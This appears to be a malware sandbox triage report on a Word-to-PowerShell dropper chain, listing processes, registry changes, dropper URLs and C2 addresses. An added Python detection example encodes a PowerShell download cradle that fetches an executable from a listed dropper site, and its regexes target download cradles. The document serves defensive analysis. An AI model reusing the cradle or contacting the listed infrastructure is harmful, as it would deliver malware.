    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\RepId\PublicId = "{F5CEA6C9-29B1-4722-9C19-47C8FB0DBC04}"   Set value (str)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"   Set value (str)

Suspicious use of WriteProcessMemory
  Processes: iexplore.exe, WINWORD.EXE, Powershell.exe, 25.exe, acquiretexas.exe
  Reported IOC (iexplore.exe): PID 4924 wrote to memory of 4972; PID 4924 wrote to memory of 4628
  Reported IOC (WINWORD.EXE): PID 4628 wrote to memory of 4156
  Reported IOC (Powershell.exe): PID 4856 wrote to memory of 724
  Reported IOC (25.exe): PID 724 wrote to memory of 5116
  Reported IOC (acquiretexas.exe): PID 4260 wrote to memory of 4228
  (The PID pairs give the parent/child edges: iexplore 4924 -> IEXPLORE 4972 and WINWORD 4628; WINWORD 4628 -> WINWORD 4156; Powershell 4856 -> 25.exe 724 -> 25.exe 5116; acquiretexas 4260 -> acquiretexas 4228.)

Suspicious behavior: EnumeratesProcesses
  Processes: WINWORD.EXE, Powershell.exe, acquiretexas.exe

Suspicious use of AdjustPrivilegeToken
  Processes: Powershell.exe
  Reported IOC (Powershell.exe): Token: SeDebugPrivilege
Processes (PID, image, command line)

PID 4924  C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" https://suncityefficiencytour[.]it/OLD-HACKED/private-module/security-088ff6mv1qh28x-620/HSzq4G-c7jn8uocnmct/
PID 4628  C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
          "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\O3NMJQL8\info_408170833067.doc" /o ""
PID 4156  C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
          "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Embedding
PID 4972  C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4924 CREDAT:82945 /prefetch:2
PID 4856  C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
          Powershell -w hidden -en [encoded command omitted from the paste]
PID 724   C:\Users\Admin\25.exe
          "C:\Users\Admin\25.exe"
PID 5116  C:\Users\Admin\25.exe
          --6dd7abed
PID 4260  C:\Windows\SysWOW64\acquiretexas.exe
          "C:\Windows\SysWOW64\acquiretexas.exe"
PID 4228  C:\Windows\SysWOW64\acquiretexas.exe
          --b26667d5

Note the pattern in the last four entries: the payload is started once without arguments, then relaunches itself with a single "--<8 hex digits>" argument, first from the user profile as 25.exe and again after being renamed into C:\Windows\SysWOW64\acquiretexas.exe (see "Drops file in System32 directory" above).
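The process list and the "unexpected child process" signature together describe a chain that is easy to express as a few process-creation rules: PowerShell launched by wmiprvse.exe (or an Office binary) with a hidden window and an encoded command, a dropped executable run from the user profile by PowerShell, and a binary relaunching itself with a "--<hex>" argument. Below is an added example of that detection logic, not part of the paste or the Triage report. The events are constructed to mirror the chain shown above (parent image, image, command line); the encoded PowerShell payload is a stand-in built by the example, since the report's own -en blob is not reproduced, and the rule names and tuple layout are the example's own choices.

```python
"""Flag the Word -> WMI -> PowerShell -> dropped EXE chain from process events (added example)."""
import base64
import re


def encode_ps(command):
    """powershell -EncodedCommand takes base64 over UTF-16LE text, not UTF-8."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_ps(blob):
    return base64.b64decode(blob).decode("utf-16-le")


# Constructed events, not sandbox output: (parent image, image, command line).
EVENTS = [
    ("C:\\Program Files\\Internet Explorer\\iexplore.exe",
     "C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE",
     '"WINWORD.EXE" /n "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\O3NMJQL8\\info_408170833067.doc"'),
    ("C:\\Windows\\system32\\wbem\\wmiprvse.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Powershell.exe",
     "Powershell -w hidden -en " + encode_ps(
         "(New-Object Net.WebClient).DownloadFile("
         "'http://wingsingreen.com/wp-admin/ujs427/', \"$env:USERPROFILE\\25.exe\")")),
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Powershell.exe",
     "C:\\Users\\Admin\\25.exe", '"C:\\Users\\Admin\\25.exe"'),
    ("C:\\Users\\Admin\\25.exe", "C:\\Users\\Admin\\25.exe", "--6dd7abed"),
    ("C:\\Windows\\SysWOW64\\acquiretexas.exe",
     "C:\\Windows\\SysWOW64\\acquiretexas.exe", "--b26667d5"),
    # Benign controls: an interactive shell and a normal service host.
    ("C:\\Windows\\explorer.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "powershell"),
    ("C:\\Windows\\System32\\services.exe",
     "C:\\Windows\\System32\\svchost.exe", "svchost.exe -k netsvcs"),
]

# Parents that have no business launching PowerShell on a workstation.
SUSPICIOUS_PARENTS = {"wmiprvse.exe", "winword.exe", "excel.exe", "outlook.exe"}
# -e / -en / -enc / -encodedcommand followed by a base64 blob.
ENC_ARG = re.compile(r"(?i)(?:^|\s)-e(?:n(?:c(?:odedcommand)?)?)?\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_ARG = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b")
DOWNLOAD_CRADLE = re.compile(
    r"(?i)DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|WebClient|BitsTransfer")
RELAUNCH_ARG = re.compile(r"^--[0-9a-f]{8}$")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Return one finding per matched rule, in event order."""
    findings = []
    for idx, (parent, image, cmdline) in enumerate(events):
        p, i = basename(parent), basename(image)
        if i == "powershell.exe" and p in SUSPICIOUS_PARENTS:
            tags = ["unexpected_parent"]
            decoded = ""
            m = ENC_ARG.search(cmdline)
            if m:
                tags.append("encoded_command")
                try:
                    decoded = decode_ps(m.group(1))
                except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
                    decoded = ""    # garbage blob: keep the finding, skip the content checks
            if HIDDEN_ARG.search(cmdline):
                tags.append("hidden_window")
            if DOWNLOAD_CRADLE.search(decoded):
                tags.append("download_cradle")
            findings.append({"event": idx, "rule": "powershell_stager", "tags": tags, "decoded": decoded})
        if p == "powershell.exe" and "\\users\\" in image.lower():
            findings.append({"event": idx, "rule": "powershell_dropped_exe", "tags": [], "decoded": ""})
        if i == p and RELAUNCH_ARG.match(cmdline.strip()):
            findings.append({"event": idx, "rule": "self_relaunch_hex_arg", "tags": [], "decoded": ""})
    return findings


if __name__ == "__main__":
    for f in evaluate(EVENTS):
        print(f"event {f['event']}: {f['rule']} {f['tags']}")
```

The first rule is the one worth keeping unconditionally: wmiprvse.exe spawning PowerShell with -w hidden and an encoded command is rare in normal operation and is exactly what the report's "Parent ... wmiprvse.exe is not expected to spawn this process" IOC flags. The self-relaunch rule is a heuristic on the argument shape seen in this sample (--6dd7abed, --b26667d5) and should be corroborated with the file rename into SysWOW64 before acting on it alone.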
Network (remote endpoint, host or URL, process; HTTP entries show method and status)

89.46.106.62:443   suncityefficiencytour.it   IEXPLORE.EXE
89.46.106.62:443   suncityefficiencytour.it   IEXPLORE.EXE
93.184.221.240:80  ctldl.windowsupdate.com   IEXPLORE.EXE
93.184.221.240:80  ctldl.windowsupdate.com   IEXPLORE.EXE
GET 200  109.70.240.130:80  http://ocsp05.actalis.it/VA/AUTH-ROOT/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSw4x5v4bTlizjNRmTdkYSy7q0R9gQUUtiIOsifeGbtifN7OHCUyQICNtACEG6Ji2gdsJH8UzyM1j%2FYAOc%3D   IEXPLORE.EXE
GET 200  109.70.240.114:80  http://ocsp09.actalis.it/VA/AUTHOV-G2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSH7LRwIYxAK55PTYjOJla%2FvWNK5gQUYv67J4pkRO1ollpYeaHbWiat%2F7sCEHDEl1QqtH3UxmUO1AJEGkU%3D   IEXPLORE.EXE
GET 200  109.70.240.114:80  http://crl09.actalis.it/Repository/AUTHOV-G2/getLastCRL   IEXPLORE.EXE
89.46.106.62:443   suncityefficiencytour.it   IEXPLORE.EXE
89.46.106.62:443   suncityefficiencytour.it   IEXPLORE.EXE
GET 200  89.46.106.62:80  http://www.suncityefficiencytour.it/OLD-HACKED/private-module/security-088ff6mv1qh28x-620/HSzq4G-c7jn8uocnmct/   IEXPLORE.EXE
117.18.232.200:443  iecvlist.microsoft.com   iexplore.exe
93.184.220.29:80    ocsp.digicert.com   iexplore.exe
117.18.232.200:443  iecvlist.microsoft.com
52.109.76.6:443     officeclient.microsoft.com
52.109.88.40:443    nexus.officeapps.live.com
52.109.88.36:443    nexusrules.officeapps.live.com
103.21.58.201:80    wingsingreen.com   Powershell.exe
GET 302  5.61.24.202:80  http://nakhlmarket.com/bhbl/718727/   Powershell.exe
185.225.236.136:443  josesmexicanfoodinc.com   Powershell.exe
171.22.26.31:80     stonearyan.com   Powershell.exe
54.36.221.251:443   mustakhalf.com   Powershell.exe
204.79.197.200:443  ieonline.microsoft.com   iexplore.exe
204.79.197.200:443  ieonline.microsoft.com   iexplore.exe
127.0.0.1:47001
93.184.221.240:80   ctldl.windowsupdate.com
104.81.140.70:443   fs.microsoft.com
68.187.160.28:443   acquiretexas.exe   (first entry in the extracted C2 list)
104.81.140.70:443   fs.microsoft.com
104.81.140.70:443   fs.microsoft.com
104.81.140.70:443   fs.microsoft.com
52.109.76.6:443     officeclient.microsoft.com   WINWORD.EXE
52.109.88.40:443    nexus.officeapps.live.com
52.109.88.36:443    nexusrules.officeapps.live.com
97.120.32.227:80    acquiretexas.exe   (second entry in the extracted C2 list)
187.188.166.192:8080  acquiretexas.exe   (third entry in the extracted C2 list)

The Powershell.exe entries are the five dropper URLs from the extracted config, contacted in config order; only the nakhlmarket.com request is logged at the HTTP layer (a 302). Everything to *.microsoft.com, *.officeapps.live.com, windowsupdate.com, digicert.com and actalis.it is browser, Office and certificate-validation background traffic from the sandbox image, not attacker infrastructure. The acquiretexas.exe connections are the payload walking the embedded C2 list from the top.